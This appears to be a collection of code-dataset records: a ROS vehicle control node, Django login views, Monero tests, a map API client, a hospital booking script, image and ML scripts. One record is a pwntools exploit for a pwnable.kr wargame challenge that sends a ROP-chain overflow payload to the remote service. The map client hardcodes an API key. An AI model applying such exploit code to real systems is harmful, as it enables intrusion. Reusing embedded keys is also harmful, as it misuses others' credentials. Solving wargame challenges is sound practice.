+{"seq_id":"77848911","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Bool\nfrom dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport\nfrom geometry_msgs.msg import TwistStamped\nfrom styx_msgs.msg import Debug\nfrom twist_controller import Controller\n\n'''\nYou can build this node only after you have built (or partially built) the `waypoint_updater` node.\n\nYou will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.\nYou can subscribe to any other message that you find important or refer to the document for list\nof messages subscribed to by the reference implementation of this node.\n\nOne thing to keep in mind while building this node and the `twist_controller` class is the status\nof `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will\nnot be the case. This may cause your PID controller to accumulate error because the car could\ntemporarily be driven by a human instead of your controller.\n\nWe have provided two launch files with this node. Vehicle specific values (like vehicle_mass,\nwheel_base) etc should not be altered in these files.\n\nWe have also provided some reference implementations for PID controller and other utility classes.\nYou are free to use them or build your own.\n\nOnce you have the proposed throttle, brake, and steer values, publish it on the various publishers\nthat we have created in the `__init__` function.\n\n'''\n\nEPSILON_THROTTLE = 0.05\nEPSILON_BRAKE = 0.05\nEPSILON_STEER = 0.05\n\n\nclass DBWNode(object):\n test = False\n def __init__(self):\n rospy.init_node('dbw_node', log_level=rospy.DEBUG)\n\n vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)\n fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)\n brake_deadband = rospy.get_param('~brake_deadband', .1)\n decel_limit = rospy.get_param('~decel_limit', -5)\n accel_limit = rospy.get_param('~accel_limit', 1.)\n wheel_radius = rospy.get_param('~wheel_radius', 0.2413)\n wheel_base = rospy.get_param('~wheel_base', 2.8498)\n steer_ratio = rospy.get_param('~steer_ratio', 14.8)\n max_lat_accel = rospy.get_param('~max_lat_accel', 3.)\n max_steer_angle = rospy.get_param('~max_steer_angle', 8.)\n kp = rospy.get_param('~kp', 1.0)\n ki = rospy.get_param('~ki', 0.0)\n kd = rospy.get_param('~kd', 0.0)\n\n self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)\n self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)\n self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)\n self.debug_publisher = rospy.Publisher('/debug_msg', Debug, queue_size=1)\n\n # Create `TwistController` object\n self.controller = Controller(vehicle_mass, fuel_capacity, brake_deadband, decel_limit, accel_limit,\n wheel_radius, wheel_base, steer_ratio, max_lat_accel, max_steer_angle, kp, ki, kd)\n\n # Subscribe to all the topics you need to\n rospy.Subscriber('/dbw_enabled', Bool, self.dbw_enabled_cb)\n rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)\n rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cmd_cb)\n\n # Members\n self.dbw_enabled = True # TODO: should be initialized with False! currently not possible since simulator sends no dbw_enabled\n self.current_velocity = None\n self.twist_cmd = None\n self.last_throttle = 0.0\n self.last_brake = 0.0\n self.last_steer = 0.0\n\n self.loop()\n\n def loop(self):\n rate = rospy.Rate(50) # 50Hz\n while not rospy.is_shutdown():\n # TODO: Get predicted throttle, brake, and steering using `twist_controller`\n # You should only publish the control commands if dbw is enabled\n # throttle, brake, steering = self.controller.control(,\n # ,\n # ,\n # ,\n # )\n\n # rospy.logwarn(\"dwb_enabled={}, current_velocity={}, twist_cmd={}\".format(\n # self.dbw_enabled, self.current_velocity != None, self.twist_cmd != None\n # ))\n\n if (self.dbw_enabled and self.current_velocity != None and self.twist_cmd != None):\n throttle, brake, steer = self.controller.control(self.twist_cmd, self.current_velocity)\n\n # if self.twist_cmd.twist.linear.x <= 0.0:\n # self.test = True\n #\n # if self.test and self.twist_cmd.twist.linear.x > 0.0:\n # rospy.logwarn(\"v_ref was 0 and is now higher\")\n # self.test = False\n\n # rospy.loginfo(\"Current_v={}, twist_v={}, Throttle={}, Brake={}, Steer={}, twist_angular_z={}\".\n # format(self.current_velocity.twist.linear.x, self.twist_cmd.twist.linear.x,\n # throttle, brake, steer, self.twist_cmd.twist.angular.z))\n\n self.publish(throttle, brake, steer)\n\n elif not self.dbw_enabled:\n self.controller.reset()\n\n # if len(self.controller.twist_values[0]) > 50:\n # dbg_msg = Debug()\n # dbg_msg.v_ref = self.controller.twist_values[0]\n # dbg_msg.v_cur = self.controller.twist_values[1]\n # dbg_msg.brake = self.controller.twist_values[2]\n # dbg_msg.throttle = self.controller.twist_values[3]\n # dbg_msg.v_err = self.controller.twist_values[4]\n # dbg_msg.lowpass_out = self.controller.twist_values[5]\n # # dbg_msg.steer = self.controller.twist_values[6]\n # # dbg_msg.twist_linear_x = self.controller.twist_values[7]\n # # dbg_msg.twist_angular_z = self.controller.twist_values[8]\n # self.debug_publisher.publish(dbg_msg)\n\n rate.sleep()\n\n def dbw_enabled_cb(self, msg):\n # rospy.loginfo(\"Received dbw_enabled message.\")\n self.dbw_enabled = msg\n # rospy.logdebug(msg)\n\n def current_velocity_cb(self, msg):\n # rospy.loginfo(\"Received current_velocity message.\")\n self.current_velocity = msg\n # rospy.logdebug(msg)\n\n def twist_cmd_cb(self, msg):\n # rospy.loginfo(\"Received twist_cmd message.\")\n self.twist_cmd = msg\n # rospy.logdebug(msg)\n\n def publish(self, throttle, brake, steer):\n if abs(self.last_throttle - throttle) > EPSILON_THROTTLE:\n self.last_throttle = throttle\n tcmd = ThrottleCmd()\n tcmd.enable = True\n tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT\n tcmd.pedal_cmd = throttle\n self.throttle_pub.publish(tcmd)\n rospy.loginfo(\"Issued throttle command, value={}\".format(throttle))\n else:\n pass\n # rospy.loginfo(\"Did no issue throttle command, value={}, last value={}\".format(throttle, self.last_throttle))\n\n if abs(self.last_steer - steer) > EPSILON_STEER:\n self.last_steer = steer\n scmd = SteeringCmd()\n scmd.enable = True\n scmd.steering_wheel_angle_cmd = steer\n self.steer_pub.publish(scmd)\n rospy.loginfo(\"Issued steer command, value={}\".format(steer))\n else:\n pass\n # rospy.loginfo(\n # \"Did no issue steer command, value={}, last value={}\".format(steer, self.last_steer))\n\n # self.current_velocity <= 0 to keep braking on traffic light\n if abs(self.last_brake - brake) > EPSILON_BRAKE or self.current_velocity <= 0:\n self.last_brake = brake\n bcmd = BrakeCmd()\n bcmd.enable = True\n # braking only works with torque...\n bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE\n bcmd.pedal_cmd = brake\n self.brake_pub.publish(bcmd)\n rospy.loginfo(\"Issued brake command, value={}\".format(brake))\n else:\n pass\n # rospy.loginfo(\n # \"Did no issue brake command, value={}, last value={}\".format(brake, self.last_brake))\n\n\nif __name__ == '__main__':\n DBWNode()\n","sub_path":"ros/src/twist_controller/dbw_node.py","file_name":"dbw_node.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44096197","text":"import json\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes, authentication_classes\nfrom rest_framework.decorators import api_view\nfrom rest_framework.views import APIView\nfrom django.contrib.auth import authenticate\nfrom account.api.serializers import RegistrationSerializer\nfrom account.models import Account\nfrom rest_framework.authtoken.models import Token\n\n\n@api_view(['POST', ])\n@permission_classes([])\n@authentication_classes([])\ndef registration_view(request):\n\n if request.method == 'POST':\n data = {}\n email = request.data.get('email', '0').lower()\n if validate_email(email) != None:\n data['error_message'] = 'That email is already in use.'\n data['response'] = 'Error'\n data['error'] = True\n return Response(data)\n\n username = request.data.get('username', '0')\n if validate_username(username) != None:\n data['error_message'] = 'That username is already in use.'\n data['response'] = 'Error'\n data['error'] = True\n return Response(data)\n\n serializer = RegistrationSerializer(data=request.data)\n\n if serializer.is_valid():\n account = serializer.save()\n data['response'] = 'successfully registered new user.'\n data['email'] = account.email\n data['username'] = account.username\n data['pk'] = account.pk\n token = Token.objects.get(user=account).key\n data['token'] = token\n else:\n data = serializer.errors\n return Response(data)\n\n\ndef validate_email(email):\n account = None\n try:\n account = Account.objects.get(email=email)\n except Account.DoesNotExist:\n return None\n if account != None:\n return email\n\n\ndef validate_username(username):\n account = None\n try:\n account = Account.objects.get(username=username)\n except Account.DoesNotExist:\n return None\n if account != None:\n return username\n\n\nclass ObtainAuthTokenView(APIView):\n\n authentication_classes = []\n permission_classes = []\n\n def post(self, request):\n context = {}\n data = json.loads(request.body)\n email = data.get('username', '0')\n password = data.get('password', 0)\n account = authenticate(email=email, password=password)\n if account:\n try:\n token = Token.objects.get(user=account)\n except Token.DoesNotExist:\n token = Token.objects.create(user=account)\n context['response'] = 'Successfully authenticated.'\n context['pk'] = account.pk\n context['email'] = email.lower()\n context['username'] = account.username\n context['token'] = token.key\n else:\n context['response'] = 'Error'\n context['error_message'] = 'Invalid credentials'\n context['error'] = True\n\n return Response(context)\n","sub_path":"Backend/src/account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"330060474","text":"#!/usr/bin/env python\n\nfrom pwn import *\nimport re, time\n\ncontext.update(arch=\"i386\", os=\"linux\", bits=\"32\", log_level=\"debug\")\n\n#TARGET = ELF(\"./horcruxes\")\n#server = [\"pwnable.kr\", 2222, \"horcruxes\", \"guest\"]\nserver = [\"pwnable.kr\", 9032]\n\nfunc_a = 0x0809FE4B\nfunc_b = 0x0809FE6A\nfunc_c = 0x0809FE89 \nfunc_d = 0x0809FEA8\nfunc_e = 0x0809FEC7\nfunc_f = 0x0809FEE6\nfunc_g = 0x0809FF05\n\ncall_ropme = 0x0809FFFC\n\npayload = \"\\x90\"*0x79\npayload += p32(func_a)\npayload += p32(func_b)\npayload += p32(func_c)\npayload += p32(func_d)\npayload += p32(func_e)\npayload += p32(func_f)\npayload += p32(func_g)\npayload += p32(call_ropme)\n\n#proc = process(executable=TARGET.path, argv=[TARGET.path])\n#conn = ssh(host=server[0], port=server[1], user=server[2], password=server[3])\nconn = connect(server[0], server[1])\n#proc = conn.process(executable=\"./horcruxes\", argv=[\"horcruxes\"])\nconn.sendline(\"\")\nconn.sendline(payload)\n\nprint(conn.recv(1024))\ntext = conn.recv(1024, timeout=1.0)\n\nregex = re.compile(r\"([\\w-][\\d]+)\")\nexp = regex.findall(text)\nexp_sum = 0\n\nfor v0 in range(0, 7):\n\tprint(v0)\n\texp_sum += int(exp[v0])\nprint(exp_sum)\nconn.interactive()\n","sub_path":"pwnablekr-horcruxes/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"91718884","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport random\nimport base64\nimport unittest\nimport pkg_resources\n\nimport asyncio\nimport aiounittest\n\nfrom .test_data import XmrTestData\nfrom .. import xmrserialize as x\nfrom .. import xmrtypes as xmr\n\n\n__author__ = 'dusanklinec'\n\n\nclass XmrTypesBaseTest(aiounittest.AsyncTestCase):\n \"\"\"Simple tests\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(XmrTypesBaseTest, self).__init__(*args, **kwargs)\n self.test_data = XmrTestData()\n\n def setUp(self):\n self.test_data.reset()\n\n async def test_simple_msg(self):\n \"\"\"\n TxinGen\n :return:\n \"\"\"\n msg = xmr.TxinGen(height=42)\n\n writer = x.MemoryReaderWriter()\n ar1 = x.Archive(writer, True)\n await ar1.message(msg)\n\n msg2 = xmr.TxinGen()\n ar2 = x.Archive(x.MemoryReaderWriter(writer.buffer), False)\n await ar2.message(msg2)\n\n self.assertEqual(msg.height, msg2.height)\n self.assertEqual(msg, msg2)\n\n async def test_boro_sig(self):\n \"\"\"\n BoroSig\n :return:\n \"\"\"\n msg = self.test_data.gen_borosig()\n\n writer = x.MemoryReaderWriter()\n ar1 = x.Archive(writer, True)\n await ar1.message(msg)\n\n msg2 = xmr.BoroSig()\n ar2 = x.Archive(x.MemoryReaderWriter(writer.buffer), False)\n await ar2.message(msg2)\n\n self.assertEqual(msg, msg2)\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main() # pragma: no cover\n\n\n\n","sub_path":"monero_serialize/tests/test_xmr_archive.py","file_name":"test_xmr_archive.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95033479","text":"import requests\nimport json\n\nSEARCH_API_URL = 'http://restapi.amap.com/v3/place/text'\nTRANSIT_API_URL = 'http://restapi.amap.com/v3/direction/transit/integrated'\nKEY = '16e4ba25613ba61da392cacbcd6347ce'\n\n\nclass AMap(object):\n @staticmethod\n def search_address(address):\n params = {\n 'key': KEY,\n 'keywords': address,\n 'city': 'shanghai'\n }\n amap_rsp = requests.get(SEARCH_API_URL, params=params)\n if amap_rsp.status_code is 200:\n return json.loads(amap_rsp.text)['pois'][0]['location'].split(',')\n else:\n return None\n\n @staticmethod\n def transit(origin_lon, origin_lat, dest_lon, dest_lat):\n params = {\n 'key': KEY,\n 'origin': origin_lon + ',' + origin_lat,\n 'destination': dest_lon + ',' + dest_lat,\n 'city': 'shanghai',\n 'strategy': 0\n }\n\n amap_rsp = requests.get(TRANSIT_API_URL, params=params)\n if amap_rsp.status_code is 200:\n rsp_json = json.loads(amap_rsp.text)\n if rsp_json['status'] is 0:\n return None\n else:\n # print(json.dumps(rsp_json, indent=4))\n return rsp_json\n\n\nclass Location(object):\n def __init__(self, name, *coordinate):\n self.name = name\n self.longitude = coordinate[0]\n self.latitude = coordinate[1]\n\n def __str__(self):\n return 'name = {0}, longitude = {1}, latitude = {2}'.format(self.name, self.longitude, self.latitude)\n\n def coordinate(self):\n return '{0},{1}'.format(self.longitude, self.latitude)\n\n\nclass Job(object):\n def __init__(self, job_raw, commute_cost):\n # translation_table = dict.fromkeys(map(ord, '!@#$'), None)\n translation_table = dict.fromkeys(map(ord, '\\'\\\"[]/'), None)\n self.salary = job_raw['salary'].translate(translation_table)\n self.title = job_raw['title'][0].translate(translation_table)\n self.address = job_raw['address'].translate(translation_table)\n self.location = Location(self.title, *job_raw['coordinate'])\n self.cost = commute_cost\n","sub_path":"crawl/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"530063162","text":"import json\nfrom com.pajk.plazass.utils import DictUtil, RegistryDao,CancelRegistryDao, ValidateUtil, AllHttpClientWriter, RocketMQWriter, LogUtil\n\n\n# import_script 武汉大学人民医院/Abstract.py\n## 武汉大学人民医院 查询预约列表\nclass RegistryList(Abstract):\n def __init__(self):\n self.__visitNoon = {\"0\": \"1\", \"1\": \"2\", \"2\": \"3\", \"3\": \"3\"} ##TODO 这个有问题\n self.__status = {\"0\":1, \"1\":2, \"2\":6, \"3\":7, \"4\":8, \"5\":8, \"6\":0, \"7\":4}\n\n def getVisitNoon(self, noon):\n visitNoon = self.__visitNoon.get(noon)\n return visitNoon if visitNoon else \"\"\n\n def getStatus(self,status):\n _status = self.__status.get(status)\n return _status if _status else 4\n\n\n\n def getRequestParams(self, message):\n ''' 获取请求参数 '''\n reqData = json.loads(message[\"content\"])\n hospitalId = message[\"from\"]\n result = {}\n result[\"url\"] = DictUtil.getDictValue(hospitalId, \"serviceUrl\") + \"personalappointlist\"\n\n\n params = {}\n params[\"IDNumberType\"] = reqData.get(\"patientIdcardtype\")\n params[\"IDNumber\"] = reqData.get(\"patientIdcard\")\n params[\"Status\"] = reqData.get(\"Status\")\n params[\"StartDate\"] = reqData.get(\"StartDate\")\n params[\"EndDate\"] = reqData.get(\"EndDate\")\n\n params[\"HospitalId\"] = DictUtil.getDictValue(hospitalId, \"channelHospId\")\n self.setCommonParams5(hospitalId, params)\n\n result[\"params\"] = params\n message[\"content\"] = result\n return message\n\n def getResponseParams(self, messageObj):\n content = messageObj[\"content\"]\n contentObj = json.loads(content)\n ReturnCode = int(contentObj[\"ReturnCode\"])\n\n if ReturnCode != 0:\n # 指定下一个引擎消息类型\n messageObj[\"msgType\"] = \"EXIT\"\n messageObj[\"returnCode\"] = \"ThirdError\"\n messageObj[\"returnMsg\"] = contentObj[\"Message\"]\n return messageObj\n\n data = self.setRegistryList(contentObj, messageObj[\"from\"])\n messageObj[\"content\"] = data\n messageObj[\"contentType\"] = \"JSON\"\n return messageObj\n\n def setRegistryList(self, contentObj, hospitalId):\n jDatas = contentObj[\"OutputInfo\"]\n returnData = []\n for jItem in jDatas:\n registry = {}\n registry[\"hospitalId\"] = hospitalId\n registry[\"hospitalName\"] = jItem[\"HospitalName\"]\n registry[\"departmentId\"] = jItem[\"DepartmentId\"]\n registry[\"departmentName\"] = jItem[\"DepartmentName\"]\n registry[\"doctorId\"] = jItem[\"DoctorId\"]\n registry[\"doctorName\"] = jItem[\"DoctorName\"]\n registry[\"visitNoon\"] = self.getVisitNoon(jItem[\"TimePartType\"])\n if jItem.get(\"TimePart\"):\n registry[\"visitTime\"] = jItem.get(\"ClinicDate\") + \" \" + jItem.get(\"TimePart\")\n else:\n registry[\"visitTime\"] = jItem.get(\"ClinicDate\")\n registry[\"registryNo\"] = jItem.get(\"AppointmentId\")\n registry[\"hospitalRegistyNo\"] = jItem.get(\"AppointmentId\")\n registry[\"registryStatus\"] = self.getStatus(jItem.get(\"Status\"))\n registry[\"statusReason\"] = jItem.get(\"StatusName\")\n\n returnData.append(registry)\n\n return returnData\n\n def execute(self, meList):\n jsonList = json.loads(meList)\n message = jsonList[0]\n\n # 1 入参转换\n message = self.getRequestParams(message)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n # 2 调用webservice\n messageStr = AllHttpClientWriter().execute(json.dumps(message))\n message = json.loads(messageStr)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n # 3 结果mapping\n message = self.getResponseParams(message)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n\n message[\"extendContent\"] = \"\"\n message[\"returnMsg\"] = u\"查询预约列表成功\"\n return self.handleResult(message)\n\n\nresult = RegistryList().execute(params)\n","sub_path":"whrm/RegistryList.py","file_name":"RegistryList.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"141187324","text":"# Author imagean\n#!/usr/bin/python\n# -*- coding:utf-8\n# opencv read image is BGR channel,and matplot read is RGB\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef homofilter(I):\n I = np.double(cv.cvtColor(I,cv.COLOR_RGB2GRAY))\n (m,n) = I.shape\n rL = 0.5\n rH = 2\n c =2\n d0 = 20\n I1 = np.log(I+1)\n FI = np.fft.fft2(I1)\n n1 = m//2\n n2 = n//2\n D = np.zeros((m,n))\n H = np.zeros((m,n))\n for i in range(m):\n for j in range(n):\n D[i,j]=((i-n1)**2+(j-n2)**2)\n H[i,j]=(rH-rL)*(np.exp(c*(-D[i,j]/(d0**2))))+rL\n\n I2 = np.fft.ifft2(H*FI)\n I3 = np.real(np.exp(I2))\n plt.subplot(1,2,1),plt.imshow(I,cmap='gray'),plt.xticks([]),plt.yticks([]),plt.title('Original Image')\n plt.subplot(1,2,2),plt.imshow(I3,cmap='gray'),plt.xticks([]),plt.yticks([]),plt.title('Homofilter Image')\n plt.show()\n plt.rcParams['font.sans-serif']=['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\nif __name__ == '__main__':\n\n img = cv.imread('C:/Users/19845/Desktop/lena2.jpg')\n (r,g,b)=cv.split(img) #颜色通道调整\n img = cv.merge([b,g,r])\n homofilter(img)\n\n","sub_path":"Image/06/001HomoFilter.py","file_name":"001HomoFilter.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"220528602","text":"import utils\nimport imageio\nif __name__ == '__main__':\n path = 'Iron_man.jpg'\n image = utils.load_image(path)\n utils.show_image(image)\n # 1.1\n image_head = utils.crop_head(image)\n # 1.2\n utils.show_image(image_head, name='ironmanhead', save=True)\n # 1.3\n image_green = utils.RGBcomponent(image_head, RGB='G')\n utils.show_image(image_green, name='ironmanheadgreen', save=True)\n # 1.4\n GRB_image = utils.RGB2GRB(image)\n imageio.imsave('img.png', GRB_image)\n utils.show_image(GRB_image, name='GRBironman', save=True)\n","sub_path":"HW1_submission/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149683592","text":"import cv2\nimport numpy as np\nfrom os import path\nimport xml.etree.ElementTree as ET\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nclass VOC07(Dataset):\n def __init__(self,data_dir,split=None,transform=None):\n self.class_name = ['person','bird','cat','cow','dog','horse','sheep','aeroplane','bicycle','boat','bus','car','motorbike','train','bottle','chair','diningtable','pottedplant','sofa','tvmonitor']\n self.data_dir = data_dir\n if split=='train':\n p = path.join(data_dir,'ImageSets','Main','train.txt')\n elif split=='val':\n p = path.join(data_dir,'ImageSets','Main','val.txt')\n else:\n p = path.join(data_dir,'ImageSets','Main','trainval.txt')\n with open(p) as f:\n self.imgs = [img.strip() for img in f.readlines()]\n self.transform = transform\n @property\n def class_num(self):\n return len(self.class_name)\n def __len__(self):\n return len(self.imgs)\n def __getitem__(self,idx):\n name = self.imgs[idx]\n img = path.join(self.data_dir,'JPEGImages',name+'.jpg')\n img = cv2.imread(img)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n anno = path.join(self.data_dir,'Annotations',name+'.xml')\n bbox = []\n label = []\n tree = ET.parse(anno)\n for i in tree.findall('object'):\n box = i.find('bndbox')\n bbox.append([\n int(box.find('ymin').text),\n int(box.find('xmin').text),\n int(box.find('ymax').text),\n int(box.find('xmax').text)\n ])\n label.append(self.class_name.index(i.find('name').text))\n bbox = np.array(bbox)\n label = np.array(label)\n sample = {'image':img,'box':bbox,'label':label}\n if self.transform:\n sample = self.transform(sample)\n return sample\nclass Rescale:\n def __init__(self,output_size):\n self.output_size = output_size\n def __call__(self,sample):\n image = sample['image']\n box = sample['box']\n h,w = image.shape[:2]\n if isinstance(self.output_size,int):\n if h>w:\n new_h, new_w = self.output_size*h//w,self.output_size\n else:\n new_h,new_w = self.output_size,self.output_size*w//h\n else:\n new_w,new_h = self.output_size\n image = cv2.resize(image, (new_w,new_h))\n box = box*[new_h/h,new_w/w,new_h/h,new_w/w]\n return {\n 'image':image,\n 'box':box,\n 'label':sample['label']\n }\nclass RandomCrop:\n def __init__(self,output_size):\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n self.output_size = output_size\n def __call__(self,sample):\n new_w,new_h = self.output_size\n while True:\n image,box,label = sample['image'],sample['box'],sample['label']\n h,w = image.shape[:2]\n top = np.random.randint(0,h-new_h)\n left = np.random.randint(0,w-new_w)\n image = image[top:top+new_h,left:left+new_w]\n box = box-[top,left,top,left]\n box[:,0::2] = np.clip(box[:,0::2],0,new_h)\n box[:,1::2] = np.clip(box[:,1::2],0,new_w)\n box_h = box[:,2]-box[:,0]\n box_w = box[:,3]-box[:,1]\n keep = np.where((box_h>20) & (box_w>20))[0]\n box = box[keep]\n label = label[keep]\n if box.shape[0]!=0:\n break\n return {\n 'image':image,\n 'box':box,\n 'label':label\n }\nclass ToTensor:\n def __call__(self,sample):\n image = np.array(sample['image'])\n image = transforms.ToTensor()(image)\n return {\n 'image':image,\n 'box':torch.tensor(sample['box'],dtype=torch.float),\n 'label':torch.tensor(sample['label'],dtype=torch.int64)\n }\nclass Normlize:\n def __init__(self):\n self.normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\n def __call__(self,sample):\n\n image = sample['image']\n image = self.normalize(image)\n return {\n 'image':image,\n 'box':sample['box'],\n 'label':sample['label']\n }\n\n \nif __name__ == '__main__':\n from torch.utils.data import DataLoader\n from torchvision import transforms\n import matplotlib.pyplot as plt\n from matplotlib.patches import Rectangle\n train_data = VOC07('VOCdevkit/VOC2007',split='train',transform=transforms.Compose([\n Rescale(801),\n RandomCrop((800,600)),\n ToTensor(),\n Normlize(),\n ]))\n data_loader = DataLoader(train_data,batch_size=1)\n for i,sample in enumerate(data_loader):\n print(i)\n # image, boxes = sample['image'][0],sample['box'][0]\n # image = torch.tensor([0.485, 0.456, 0.406]).reshape(-1,1,1) + torch.tensor([0.229, 0.224, 0.225]).reshape(-1,1,1)*image\n # plt.imshow(image.numpy().transpose(1,2,0))\n # plt.show()\n # for i in range(boxes.shape[0]):\n # box = boxes[i]\n # x,y=box[1],box[0]\n # w = box[3]-box[1]\n # h = box[2]-box[0]\n # plt.gca().add_patch(Rectangle((x,y),w,h,fill=False,color='r'))\n #plt.show()","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349660046","text":"import csv\n\nimport pandas\nimport numpy as np\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import KFold, cross_val_score\nimport datetime\n\nfrom sklearn.preprocessing import StandardScaler\n\ndef data_prepocessing(features):\n features.drop(['duration', 'radiant_win', 'tower_status_radiant', 'tower_status_dire', 'barracks_status_radiant',\n 'barracks_status_dire'], axis=1, inplace=True)\n for k, v in features.count().to_dict().items():\n if v != features.shape[0]:\n print(k, v)\n features.fillna(0, inplace=True)\n\n\ndef gradient_boosting():\n kf = KFold(n_splits=5, shuffle=True, random_state=1)\n best_n = 0\n max_score = 0\n\n for n in np.linspace(10, 100, 10):\n start_time = datetime.datetime.now()\n gbc = GradientBoostingClassifier(n_estimators=int(n), random_state=241, max_depth=2)\n scores = cross_val_score(gbc, features, target, cv=kf, scoring='roc_auc')\n mean_score = scores.mean()\n if max_score < mean_score:\n max_score = mean_score\n best_n = n\n print(n, mean_score)\n print('Time elapsed:', (datetime.datetime.now() - start_time).seconds)\n\n print('best parameters: ', best_n, max_score)\n\n\ndef logistic_regression(C_min, C_max):\n scaler = StandardScaler()\n scaled_features = scaler.fit_transform(features)\n\n kf = KFold(n_splits=5, shuffle=True, random_state=1)\n best_C = 0\n max_score = 0\n\n for C in np.linspace(C_min, C_max, 10):\n start_time = datetime.datetime.now()\n lr = LogisticRegression(penalty='l2', random_state=241, solver='lbfgs', C=C)\n scores = cross_val_score(lr, scaled_features, target, cv=kf, scoring='roc_auc')\n mean_score = scores.mean()\n if max_score < mean_score:\n max_score = mean_score\n best_C = C\n print(C, mean_score)\n print('Time elapsed:', datetime.datetime.now() - start_time)\n\n print('best parameters: ', best_C, max_score)\n\n\nfeatures = pandas.read_csv('./features.csv', index_col='match_id')\ntarget = features['radiant_win']\ndata_prepocessing(features)\ngradient_boosting()\n\n'''logistic regression on full data'''\nlogistic_regression(C_min=0.1, C_max=10)#1.0,(0.1, 0.7163838498885824)\n\n\n'''logistic regression on data without categorical features'''\nheroes = []\nfor p in range(5):\n heroes = np.concatenate((heroes, features['r%d_hero' % (p+1)].unique(), features['d%d_hero' % (p+1)].unique()), axis=None)\n\nheroes = np.unique(heroes)\nheroes_num = int(max(heroes))\nprint(heroes_num, heroes.size)\nX_pick = np.zeros((features.shape[0], heroes_num))\n\nfor i, match_id in enumerate(features.index):\n for p in range(5):\n X_pick[i, features.ix[match_id, 'r%d_hero' % (p+1)]-1] = 1\n X_pick[i, features.ix[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\nfeatures.drop(['lobby_type'], axis=1, inplace=True)\nfor p in range(5):\n features.drop(['r%d_hero' % (p+1), 'd%d_hero' % (p+1)], axis=1, inplace=True)\nlogistic_regression(C_min=0.1, C_max=10)#(0.1, 0.7518611029875298)\n\n\n'''logistic regression on data with bag of words'''\nfor i in range(heroes_num):\n features[str(i)] = X_pick[:, i]\nlogistic_regression(C_min=0.1, C_max=10)#(0.1, 0.7518611029875298)\n\n\n'''predicting on test data'''\ntest_features = pandas.read_csv('./features_test.csv', index_col='match_id')\ntest_features.head()\ntest_features.fillna(0, inplace=True)\n\nX_pick = np.zeros((test_features.shape[0], heroes_num))\nfor i, match_id in enumerate(test_features.index):\n for p in range(5):\n X_pick[i, test_features.ix[match_id, 'r%d_hero' % (p+1)]-1] = 1\n X_pick[i, test_features.ix[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\ntest_features.drop(['lobby_type'], axis=1, inplace=True)\nfor p in range(5):\n test_features.drop(['r%d_hero' % (p+1), 'd%d_hero' % (p+1)], axis=1, inplace=True)\n\nfor i in range(heroes_num):\n test_features[str(i)] = X_pick[:, i]\nscaler = StandardScaler()\nscaled_features = scaler.fit_transform(features)\nscaled_test_features = scaler.transform(test_features)\n\nlr = LogisticRegression(penalty='l2', random_state=241, C=0.1)\nlr.fit(scaled_features, target)\nprobas = lr.predict_proba(scaled_test_features)[:, 1]\n\nmin_proba = min(probas)\nmax_proba = max(probas)\n\nprint(max_proba, min_proba)\n","sub_path":"week 7. Project/win_prediction.py","file_name":"win_prediction.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222595142","text":"import graphene\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django import DjangoObjectType\nfrom django.contrib.auth import get_user_model\nfrom 